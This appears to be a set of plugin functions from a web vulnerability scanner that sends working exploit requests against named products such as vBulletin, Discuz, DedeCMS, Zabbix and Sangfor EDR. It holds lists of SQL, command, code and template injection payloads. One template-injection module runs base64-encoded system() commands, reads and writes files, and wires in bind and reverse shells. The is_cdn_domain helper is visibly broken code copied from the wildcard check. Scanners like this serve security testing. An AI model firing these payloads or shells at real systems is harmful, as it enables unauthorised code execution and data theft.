def test(self, swf): req = { "method": "GET", # payload : "])}catch(e){if(!window.x){window.x=1;alert("xss")}} "url": self.url + swf + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200: md5_value = getmd5(r.text) if md5_value in self.md5_list: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): if self.dictdata.get("url").get("extension")[:3] not in ["php", ""]: return parser = dictdata_parser(self.dictdata) params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") num1 = get_random_num(8) num1_md5 = getmd5(num1) regx = 'Parse error: syntax error,.*?\sin\s' payloads = ( "print(md5({}));", " print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='", "\";print(md5({}));$a=\"", "${{@print(md5({}))}}", "${{@print(md5({}))}}\\", "'.print(md5({})).'" ) if params: for param in params: for payload in payloads: method = "a" if payload[0] == "p" else "w" payload=payload.format(num1) req = parser.getreqfromparam(param, text=payload, method=method) r = request(**req) if r is not None: if num1_md5 in r.text: self.save(r, param, payload) break elif re.search(regx, r.text, re.I | re.S): self.save(r, param, "search rule: " + regx) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_int = get_random_num(5) md5 = getmd5(random_int) req = { "method": "POST", "url": self.url, "headers": { "Content-Type": "application/x-www-form-urlencoded" }, "data": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({rand}))%3bexit%3b".format( rand=random_int), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r is not None and r.status_code == 200 and md5.encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return num = get_random_num(4) num_md5 = getmd5(num) req = { "method": "GET", "url": self.url + "viewthread.php?tid=10", # "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "cookies": { "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D": "/.*/eui", "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D": "print_r(md5({}))".format(num) }, "timeout": 10, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and num_md5[10:20].encode( ) in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def is_wildcard_dns(domain, istopdomain=False, level=1): ''' domain: like baidu.com or www.baidu.com topdomain: True--> domain is baidu.com,False--> domain is www.baidu.com return : True: False: None: error ''' if not istopdomain: domain = ".".join(domain.split(".")[1:]) if domain == "": return None # red = getredis() key = getmd5(domain) if red.sismember("dns_wildcard_true", key): return True if red.sismember("dns_wildcard_false", key): return False try: r = dns.resolver.Resolver(configure=False) r.nameservers = others.dns_servers answers = r.query('myscan-not-%s-test.%s' % (get_random_str(4).lower(), domain)) ips = ', '.join(sorted([answer.address for answer in answers])) if level == 1: wildcard_test('any-sub-to.%s' % domain, istopdomain, 2) elif level == 2: red.sadd("dns_wildcard_true", key) return True except Exception as e: red.sadd("dns_wildcard_false", key) return False
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_str = get_random_num(4) req = { "method": "GET", "url": self.url + "tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5" + str(random_str) + ";{/dede:field}", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "verify": False, "allow_redirects": True } r = request(**req) if r != None and r.status_code == 200 and (getmd5( str(random_str))[10:20]).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_int = get_random_num(5) req = { "method": "GET", "url": self.url + "index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({})%27" .format(random_int), "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and ( getmd5(random_int)[10:20]).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return num = get_random_num(4) num_md5 = getmd5(num) req = { "method": "GET", "url": self.url + "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({})),0)" .format(num), "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and num_md5[10:20].encode( ) in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def is_perfile_doned(self): ''' return bool ''' hashstr = getmd5(self.getperfile())[10:20] if not self.red.sismember(self.keys.get("perfile"), hashstr): self.red.sadd(self.keys.get("perfile"), hashstr) return False return True
def http_md5(self, dictdata): ''' return bool ''' method = dictdata.get("request").get("method") name, value = self.getallargs(dictdata) if db_set.get("es_uniq"): hashstr = getmd5( "{protocol}-{host}-{port}-{method}-{path}-{argsname}".format(argsname="".join(name), method=method, **dictdata.get("url"))) else: hashstr = getmd5( "{protocol}-{host}-{port}-{method}-{path}-{argsname}-{value}".format( argsname="".join(name), value="".join(value), method=method, **dictdata.get("url"))) return hashstr
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return #搜索返回包: parser = dictdata_parser(self.dictdata) if self.search(parser.getresponsebody(), "Null payload , errors in response text "): return # pass # body url参数注入 random_num = get_random_num(8) random_num_md5 = getmd5(random_num) payloads = [ ('鎈\'"\(', None, "a"), ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format( random_num), random_num_md5, "a"), ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format( random_num), random_num_md5, "a"), ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0" .format(random_num), random_num_md5, "a"), ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0' .format(random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"), ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num), random_num_md5, "w"), ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w") ] params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: for payload, search_str, method in payloads: req = parser.getreqfromparam(param, method, payload) r = request(**req) if search_str == None: if self.search(r, payload): break # pass else: if self.search_md5(r, random_num_md5[10:20], payload): break # pass # cookie注入 pass
def verify(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8")) response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8")) dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore") dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore") dictdata["request"]["headers"] = str(dictdata["request"]["headers"]) dictdata["response"]["headers"] = str(dictdata["response"]["headers"]) if "others" in dictdata.keys(): del dictdata["others"] if "filter" in dictdata.keys(): del dictdata["filter"] dictdata["source"] = "burp" dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host")) dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url")) if dictdata["url"]["extension"] == "ico": body = response_raw[int(dictdata.get("response").get("bodyoffset")):] dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body))) actions = [] action = { "_index": "httpinfo", "_id": self.http_md5(dictdata), "_source": dictdata } actions.append(action) # get url from html urls_from_html = self.get_html_url(dictdata["url"]["url"], response_raw[int(dictdata.get("response").get("bodyoffset")):].decode( "utf-8", "ignore"), dictdata["response"]["mime_inferred"]) logger.debug("urls_from_html total:{}".format(len(urls_from_html))) if urls_from_html: mythread(self.getaddr, self.hosts, 50) for url_data in urls_from_html: url_data["ip"] = self.dict_host_ip[url_data["host"]] action_ = { "_index": "httpinfo", "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)), "_source": {"url": url_data, "source": "html", "ts": dictdata["ts"]} } actions.append(action_) try: helpers.bulk(others.es_conn, actions) logger.debug("es insert {} lines".format(len(actions))) except Exception as ex: logger.warning("Plugin {} get error:{}".format(__name__, ex)) traceback.print_exc()
def find_ip(self): if is_ipaddr(self.domain): return self.domain red = getredis() key = getmd5("domain_to_ip_" + self.domain) res = red.get(key) if res: return res.decode() mythread(self.query, copy.deepcopy(others.dns_servers), 6) data = ",".join(list(self.msg)) red.set(key, data) return data
def args_inject(self, data): req, payload, search_str, random_num_md5, param = data param_str = getmd5(str(param)) if param_str in self.found: return r = request(**req) if r is not None: if search_str == None: if self.search(r, payload, param.get("name", "")): self.found.append(param_str) else: if self.search_md5(r, random_num_md5[10:20], payload): self.found.append(param_str)
def output(self, msg, insert=False): msg = "/".join(self.url.split("/")[:3]) + " " + msg msgmd5 = getmd5(msg)[10:18] red = getredis() if insert == False: if not red.sismember("myscan_max_output", msgmd5): return True # 可以输出 else: # logger.debug("sql boolen moudle : {} 输出个数已达{}上限,不再测试输出".format(msg, self.verify_count)) return False # 不可以继续输出 else: # red.hincrby("myscan_max_output", msgmd5, amount=1) red.sadd("myscan_max_output", msgmd5)
def is_perfolder_doned(self): ''' return list ''' res = [] folders = self.getperfolders() if not folders: return [] for folder in folders: hashstr = getmd5(folder)[10:20] if not self.red.sismember(self.keys.get("perfolder"), hashstr): self.red.sadd(self.keys.get("perfolder"), hashstr) res.append(folder) return res
def header_inject(self, data): req, data_ = data payload, search_str, k, msg = data_ if self.output(msg): random_num = get_random_num(8) random_num_md5 = getmd5(random_num) r = request(**req) if r is not None: if search_str == None: if self.search(r, payload, "headers's {}".format(k)): self.output(msg, True) else: if self.search_md5(r, random_num_md5[10:20], payload): self.output(msg, True)
def can_output(self, msg, insert=False): ''' msg : should url+somename ''' msgmd5 = getmd5(msg) red = getredis() if insert == False: if not red.sismember("myscan_max_output", msgmd5): return True # 可以输出 else: logger.debug("{} 输出个数已达一次,不再测试输出".format(msg)) return False # 不可以继续输出 else: # red.hincrby("myscan_max_output", msgmd5, amount=1) red.sadd("myscan_max_output", msgmd5)
def is_perscheme_doned(self): ''' return bool ''' method = self.dictdata.get("request").get("method") urlpath = self.dictdata.get("url").get("path") host = self.dictdata.get("url").get("host") protocol = self.dictdata.get("url").get("protocol") port = self.dictdata.get("url").get("port") argsname = "".join(self.getallargs()) hashstr = getmd5("{}{}{}{}{}{}".format(protocol, host, port, method, urlpath, argsname)) if not self.red.sismember(self.keys.get("perscheme"), hashstr): self.red.sadd(self.keys.get("perscheme"), hashstr) return False return True
def getaddr(self, domain): if is_ipaddr(domain): self.dict_host_ip[domain] = domain return domain key = getmd5("dnsdata_{}".format(domain)) dnsdata = self.red.get(key) if dnsdata == b"": self.dict_host_ip[domain] = None return None elif dnsdata is not None: # print("already fuond it {} {}".format(domain,dnsdata)) self.dict_host_ip[domain] = dnsdata.decode() return dnsdata.decode() else: # method 1 # try: # resolver = dns.resolver.Resolver() # resolver.timeout = 5 # resolver.lifetime = 5 # A = resolver.query(domain, 'A') # 指定查看类型为A记录 # addrs = [] # for i in A.response.answer: # for j in i.items: # 遍历回应信息 # if str(j).replace(".", "").isdigit(): # addrs.append(str(j)) # self.dict_host_ip[domain] = addrs[0] # self.red.set(key, addrs[0]) # return addrs[0] # except: # self.dict_host_ip[domain] = None # self.red.set(key, "") # return None # method 2 try: result = socket.getaddrinfo(domain, None) domain_ip = result[-1][-1][0] self.dict_host_ip[domain] = domain_ip self.red.set(key, domain_ip) return domain_ip except Exception as ex: # traceback.print_exc() self.dict_host_ip[domain] = None self.red.set(key, "") return None
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return parser = dictdata_parser(self.dictdata) params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") num1 = get_random_num(4) num2 = get_random_num(4) num1_num2 = num1 + num2 num1num2 = num1 * num2 num1_md5 = getmd5(num1) payloads = ( {"cmd": "\nexpr {} + {}\n".format(num1, num2), "show": num1_num2, "method": "a"}, {"cmd": "|expr {} + {}".format(num1, num2), "show": num1_num2, "method": "a"}, {"cmd": "$(expr {} + {})".format(num1, num2), "show": num1_num2, "method": "a"}, {"cmd": "&set /A {}+{}".format(num1, num2), "show": num1_num2, "method": "a"}, {"cmd": "${@var_dump(md5(%s))};" % num1, "show": num1_md5, "method": "w"}, {"cmd": "{}*{}" % num1, "show": num1num2, "method": "w"}, {"cmd": "'-var_dump(md5(%s))-'" % num1, "show": num1_md5, "method": "w"}, {"cmd": "/*1*/{{%s+%s}}" % (num1, num2), "show": num1_num2, "method": "w"}, {"cmd": "${%s+%s}" % (num1, num2), "show": num1_num2, "method": "w"}, {"cmd": "${(%s+%s)?c}" % (num1, num2), "show": num1_num2, "method": "w"}, {"cmd": "#set($c=%s+%s)${c}$c" % (num1, num2), "show": num1_num2, "method": "w"}, {"cmd": "<%- {}+{} %>".format(num1, num2), "show": num1_num2, "method": "w"}, ) if params: for param in params: for payload in payloads: req = parser.getreqfromparam(param, text=payload.get("cmd"), method=payload.get("method")) r = request(**req) if r != None and str(payload.get("show")) in r.text: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "param": param.get("name"), "payload": payload, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_s = get_random_str(6) req = { "method": "POST", "url": self.url + "api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9", # "headers": headers, # 主要保留cookie等headers "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "data": r'''{"params":"w=123\"'1234123'\"|echo -n %s |md5sum"}''' % (random_s), "allow_redirects": False, "verify": False, } r = request(**req) if r is not None and getmd5(random_s).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def is_cdn_domain(domain): ''' return True ,False ''' red = getredis() key = getmd5(domain) if red.sismember("domain_cdn_true", key): return True if red.sismember("domain_cdn_false", key): return False try: r = dns.resolver.Resolver(configure=False) r.nameservers = others.dns_servers answers = r.query('myscan-not-%s-test.%s' % (get_random_str(4).lower(), domain)) ips = ', '.join(sorted([answer.address for answer in answers])) if level == 1: wildcard_test('any-sub-to.%s' % domain, istopdomain, 2) elif level == 2: red.sadd("dns_wildcard_true", key) return True except Exception as e: red.sadd("dns_wildcard_false", key) return False
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return num = get_random_num(4) num_md5 = getmd5(num) req = { "method": "GET", "url": self.url + "faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5({}),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23" .format(num), # "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and num_md5[10:20].encode( ) in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def language_init(self): self.update_actions({ 'render': { 'call': 'inject', 'render': """%(code)s""", 'header': """print_r('%(header)s');""", 'trailer': """print_r('%(trailer)s');""", 'test_render': 'print(md5(%(r1)s));' % { 'r1': rand.randints[0] }, 'test_render_expected': '%(r1)s' % { 'r1': getmd5(rand.randints[0])[0:10] } }, 'write': { 'call': 'evaluate', 'write': """$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""", 'truncate': """file_put_contents("%(path)s", "");""" }, 'read': { 'call': 'evaluate', 'read': """print(base64_encode(file_get_contents("%(path)s")));""" }, 'md5': { 'call': 'evaluate', 'md5': """is_file("%(path)s") && print(md5_file("%(path)s"));""" }, 'evaluate': { 'call': 'render', 'evaluate': """%(code)s""", 'test_os': 'echo PHP_OS;', 'test_os_expected': '^[\w-]+$' }, 'execute': { 'call': 'evaluate', 'execute': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""", 'test_cmd': bash.echo % { 's1': rand.randstrings[2] }, 'test_cmd_expected': rand.randstrings[2] }, 'blind': { 'call': 'evaluate_blind', 'test_bool_true': """True""", 'test_bool_false': """False""" }, 'evaluate_blind': { 'call': 'inject', 'evaluate_blind': """$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");""" }, 'execute_blind': { 'call': 'inject', 'execute_blind': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");""" }, 'bind_shell': { 'call': 'execute_blind', 'bind_shell': bash.bind_shell }, 'reverse_shell': { 'call': 'execute_blind', 'reverse_shell': bash.reverse_shell }, }) self.set_contexts([ # Text context, no closures { 'level': 0 }, # This terminates the statement with ; { 'level': 1, 'prefix': '%(closure)s;', 'suffix': '//', 'closures': ctx_closures }, # This does not need termination e.g. if(%s) {} { 'level': 2, 'prefix': '%(closure)s', 'suffix': '//', 'closures': ctx_closures }, # Comment blocks { 'level': 5, 'prefix': '*/', 'suffix': '/*' }, ])
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return # 搜索返回包: self.parser = dictdata_parser(self.dictdata) # 黑名单 # tomcat if self.dictdata.get("url").get("path").startswith( "/examples/") or self.dictdata.get("url").get( "path").startswith("/docs/"): return # body url参数注入 random_num = get_random_num(8) random_num_md5 = getmd5(random_num) payloads = [ ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format( random_num), random_num_md5, "a"), ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format( random_num), random_num_md5, "a"), ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0" .format(random_num), random_num_md5, "a"), ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0' .format(random_num), random_num_md5, "a"), ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format( random_num), random_num_md5, "a"), ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format( random_num), random_num_md5, "a"), ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"), ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))". format(random_num), random_num_md5, "w"), ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w") ] params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") reqs = [] if params: for param in params: for payload, search_str, method in [('鎈\'"\(', None, "a") ] + payloads: req = self.parser.getreqfromparam(param, method, payload) reqs.append( (req, payload, search_str, random_num_md5, param)) mythread(self.args_inject, reqs, cmd_line_options.threads) # header注入 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_error_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_error_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_error_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_error_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_error_xfh", "default": "2.40.9.144" }, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") for payload, search_str, method in [('\'"\(', None, "a") ] + payloads: headers_withpayload = copy.deepcopy(headers) headers_withpayload[k] = headers_withpayload[ k] + payload if method == "a" else payload req = self.parser.generaterequest( {"headers": headers_withpayload}) reqs.append((req, (payload, search_str, k, v.get("msg")))) mythread(self.header_inject, reqs, cmd_line_options.threads)